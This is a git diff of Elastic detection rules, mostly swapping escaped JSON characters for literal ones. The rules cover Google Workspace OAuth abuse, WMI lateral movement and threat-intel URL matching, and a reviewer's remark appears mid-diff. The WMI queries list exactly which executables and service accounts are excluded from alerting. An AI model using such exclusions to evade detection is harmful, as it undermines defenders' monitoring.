suggesting the object uses container-bound scripts to accomplish a legitimate task." + ], + "from": "now-130m", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "eql", + "license": "Elastic License v2", + "name": "Google Workspace Object Copied from External Drive and Access Granted to Custom Application", + "note": "## Triage and analysis\n\n### Investigating Google Workspace Resource Copied from External Drive and Access Granted to Custom Application\n\nGoogle Workspace users can share access to Drive objects such as documents, sheets, and forms via email delivery or a shared link. Shared link URIs have parameters like `view` or `edit` to indicate the recipient's permissions. 
The `copy` parameter allows the recipient to copy the object to their own Drive, which grants the object with the same privileges as the recipient. Specific objects in Google Drive allow container-bound scripts that run on Google's Apps Script platform. Container-bound scripts can contain malicious code that executes with the recipient's privileges if in their Drive.\n\nThis rule aims to detect when a user copies an external Drive object to their Drive storage and then grants permissions to a custom application via OAuth prompt.\n\n#### Possible investigation steps\n- Identify user account(s) associated by reviewing `user.name` or `source.user.email` in the alert.\n- Identify the name of the file copied by reviewing `file.name` as well as the `file.id` for triaging.\n- Identify the file type by reviewing `google_workspace.drive.file.type`.\n- With the information gathered so far, query across data for the file metadata to determine if this activity is isolated or widespread.\n- Within the OAuth token event, identify the application name by reviewing `google_workspace.token.app_name`.\n - Review the application ID as well from `google_workspace.token.client.id`.\n - This metadata can be used to report the malicious application to Google for permanent blacklisting.\n- Identify the permissions granted to the application by the user by reviewing `google_workspace.token.scope.data.scope_name`.\n - This information will help pivot and triage into what services may have been affected.\n- If a container-bound script was attached to the copied object, it will also exist in the user's drive.\n - This object should be removed from all users affected and investigated for a better understanding of the malicious code.\n\n### False positive analysis\n- Communicate with the affected user to identify if these actions were intentional\n- If a container-bound script exists, review code to identify if it is benign or malicious\n\n### Response and remediation\n- Initiate the incident 
response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n - Resetting passwords will revoke OAuth tokens which could have been stolen.\n- Reactivate multi-factor authentication for the user.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security defaults [provided by Google](https://cloud.google.com/security-command-center/docs/how-to-investigate-threats).\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n## Setup\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 
minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "sequence by source.user.email with maxspan=3m\n[file where event.dataset == \"google_workspace.drive\" and event.action == \"copy\" and\n\n /* Should only match if the object lives in a Drive that is external to the user's GWS organization */\n google_workspace.drive.owner_is_team_drive == \"false\" and google_workspace.drive.copy_type == \"external\" and\n\n /* Google Script, Forms, Sheets and Document can have container-bound scripts */\n google_workspace.drive.file.type: (\"script\", \"form\", \"spreadsheet\", \"document\")]\n\n[any where event.dataset == \"google_workspace.token\" and event.action == \"authorize\" and\n\n /* Ensures application ID references custom app in Google Workspace and not GCP */\n google_workspace.token.client.id : \"*apps.googleusercontent.com\"]\n", + "references": [ + "https://www.elastic.co/security-labs/google-workspace-attack-surface-part-one", + "https://developers.google.com/apps-script/guides/bound", + "https://support.google.com/a/users/answer/13004165#share_make_a_copy_links" + ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "google_workspace.drive.copy_type", + "type": "unknown" + }, + { + "ecs": false, + "name": "google_workspace.drive.file.type", + "type": 
"keyword" + }, + { + "ecs": false, + "name": "google_workspace.drive.owner_is_team_drive", + "type": "unknown" + }, + { + "ecs": false, + "name": "google_workspace.token.client.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.user.email", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f33e68a4-bd19-11ed-b02f-f661ea17fbcc", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 4 + }, + "id": "f33e68a4-bd19-11ed-b02f-f661ea17fbcc_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f3403393-1fd9-4686-8f6e-596c58bc00b4_1.json b/packages/security_detection_engine/kibana/security_rule/f3403393-1fd9-4686-8f6e-596c58bc00b4_1.json index 062b130a079..526044a8c13 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3403393-1fd9-4686-8f6e-596c58bc00b4_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f3403393-1fd9-4686-8f6e-596c58bc00b4_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", 
diff --git a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_103.json b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_103.json
index 6153a614b9b..c82195655fd 100644
--- a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_103.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "WMI Incoming Lateral Movement", - "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port \u003e= 49152 and destination.port \u003e= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"C:\\\\windows\\\\TEMP\\\\nessus_*.TMP\",\n \"C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", + "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"C:\\\\windows\\\\TEMP\\\\nessus_*.TMP\",\n \"C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", "related_integrations": [ { "package": "endpoint", @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", 
@@ -97,7 +97,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_104.json b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_104.json
index f17957c8a9d..fc8ee52665f 100644
--- a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_104.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "WMI Incoming Lateral Movement", - "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port \u003e= 49152 and destination.port \u003e= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", + "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", "related_integrations": [ { "package": "endpoint", @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", 
@@ -97,7 +97,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_105.json b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_105.json
index c3bb17a2ea4..b5cb69965ec 100644
--- a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_105.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "WMI Incoming Lateral Movement", - "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port \u003e= 49152 and destination.port \u003e= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", + "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", "related_integrations": [ { "package": "endpoint", @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", 
@@ -96,7 +96,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_106.json b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_106.json
index 6833f7b3fdb..ab53b1e5246 100644
--- a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_106.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "WMI Incoming Lateral Movement", - "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port \u003e= 49152 and destination.port \u003e= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"*C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCM\\\\ccmrepair.exe\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", + "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"*C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCM\\\\ccmrepair.exe\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", "related_integrations": [ { "package": "endpoint", @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", 
@@ -96,7 +96,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_107.json b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_107.json
index 9fbfd05d159..594c7964cfa 100644
--- a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_107.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "WMI Incoming Lateral Movement", - "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port \u003e= 49152 and destination.port \u003e= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"*C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCM\\\\ccmrepair.exe\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", + "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"*C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCM\\\\ccmrepair.exe\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", "related_integrations": [ { "package": "endpoint", @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", 
@@ -97,7 +97,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_108.json b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_108.json
index 2c4af3bd343..09c231cd450 100644
--- a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_108.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "WMI Incoming Lateral Movement", - "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port \u003e= 49152 and destination.port \u003e= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and \n not process.Ext.token.integrity_level_name : \"system\" and not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and \n not process.executable : \n (\"?:\\\\Program Files\\\\HPWBEM\\\\Tools\\\\hpsum_swdiscovery.exe\", \n \"?:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe\", \n \"?:\\\\Windows\\\\System32\\\\wbem\\\\mofcomp.exe\", \n \"?:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\csc.exe\", \n \"?:\\\\Windows\\\\System32\\\\powercfg.exe\") and \n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"REBOOT=ReallySuppress\") and \n not (process.executable : \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\appcmd.exe\" and process.args : \"uninstall\")\n ]\n", + "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and \n not process.Ext.token.integrity_level_name : \"system\" and not user.id : (\"S-1-5-18\", \"S-1-5-19\", 
\"S-1-5-20\") and \n not process.executable : \n (\"?:\\\\Program Files\\\\HPWBEM\\\\Tools\\\\hpsum_swdiscovery.exe\", \n \"?:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe\", \n \"?:\\\\Windows\\\\System32\\\\wbem\\\\mofcomp.exe\", \n \"?:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\csc.exe\", \n \"?:\\\\Windows\\\\System32\\\\powercfg.exe\") and \n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"REBOOT=ReallySuppress\") and \n not (process.executable : \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\appcmd.exe\" and process.args : \"uninstall\")\n ]\n", "related_integrations": [ { "package": "endpoint", @@ -103,7 +103,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -118,7 +118,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_101.json b/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_101.json index bd8bda9bee0..e1dd9cddcd7 100644 --- a/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_101.json +++ b/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_101.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_102.json b/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_102.json index 0d4826bfee4..0137d3a5dd6 100644 --- a/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_102.json 
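Review bot: The in-query comment `/* Excluding Common FPs Nessus and SCCM */` in the `_108` query no longer describes the exclusion list beneath it, which now also suppresses SYSTEM-integrity children, the three well-known service SIDs `S-1-5-18`/`S-1-5-19`/`S-1-5-20`, HP WBEM discovery, `mofcomp.exe`, `csc.exe` under `Framework*`, `powercfg.exe`, and specific `msiexec.exe`/`appcmd.exe` argument combinations; an analyst tuning the rule will read the comment and overlook half the suppressions. Suggest `/* Excluding common FPs: SCCM/CCM, HP WBEM, .NET and MOF compilers, powercfg, scripted msiexec/appcmd installs, and SYSTEM-token children */`, or, since this file is presumably a versioned export of the upstream rule, fixing it at the source so the next export carries it. Several new lines also end in `and \n` with a trailing space before the newline, harmless to EQL but noise in future diffs. The `_107` sibling in the previous hunk still matches its comment, so this applies only to `_108`.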
+++ b/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_102.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_103.json b/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_103.json index f55bc658043..5e5b4055057 100644 --- a/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_103.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_1.json b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_1.json index fa9b0b5c619..9ba3c3fb964 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_1.json @@ -128,7 +128,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.url.full:* or threat.indicator.url.domain:*) and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.url.full:* or threat.indicator.url.domain:*) and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", 
diff --git a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_2.json b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_2.json index c9cf6290623..894ebb41934 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_2.json +++ b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_2.json @@ -125,7 +125,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.url.full:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.url.full:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_3.json b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_3.json index 1fafb7fb47f..bf9bc7a5b41 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_3.json +++ b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_3.json 
@@ -17,7 +17,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel URL Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel URL Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a URL indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains URL data, like DNS events, network logs, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the URL, which can be found in the `threat.indicator.matched.atomic` field:\n - Identify the type of malicious activity related to the URL (phishing, malware, etc.).\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. \n - 